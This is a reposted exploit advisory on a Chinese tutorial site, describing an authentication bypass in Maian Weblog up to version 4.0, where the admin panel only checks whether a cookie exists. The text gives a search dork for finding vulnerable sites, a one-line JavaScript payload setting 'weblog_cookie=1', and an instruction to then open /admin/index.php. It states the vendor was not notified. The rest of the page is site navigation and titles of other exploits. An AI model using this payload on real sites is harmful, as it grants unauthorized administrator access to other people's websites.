首页
 导航
语文
作文
 手机
客服中心
投稿赚钱
免费注册
首页
当前位置:查字典教程网 >网络安全 >Exploit >Maian Weblog
Maian Weblog
摘要:-[*]==================================================================...

-[*] ================================================================================ [*]-

-[*] Maian Weblog <= v4.0 Insecure Cookie Handling Vulnerability [*]-

-[*] ================================================================================ [*]-

[*] Discovered By: S.W.A.T.

[*] E-Mail: svvateam[at]yahoo[dot]com

[*] Script Download: http://www.maianscriptworld.co.uk

[*] DORK: Powered by Maian Weblog v4.0

[*] Vendor Has Not Been Notified!

[*] DESCRIPTION:

Maian Weblog suffers from a insecure cookie, the admin panel only checks if the cookie

exists.

and not the content. so we can easyily craft a cookie and look like a admin.

[*] Vulnerability:

javascript:document.cookie = "weblog_cookie=1; path=/";

[*] NOTE/TIP:

after running the javascript, visit "/admin/index.php" to view admin area.

-[*] ================================================================================ [*]-

-[*] Maian Weblog <= v4.0 Insecure Cookie Handling Vulnerability [*]-

-[*] ================================================================================ [*]-

【Maian Weblog】相关文章:

Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)

Maian Search

MFORUM 0.1a Arbitrary Add-Admin Vulnerability

Rianxosencabos CMS 0.9 Remote Add Admin Exploit

Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit

Maian Uploader

Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC

Maian Guestbook

MyBulletinBoard (MyBB)

上一篇: Maian Search
相关阅读
更多>>
网友关注
更多>>
网友最新关注视频
更多>>
精品推荐
分类导航
网络安全子分类
最新Exploit学习
热门Exploit学习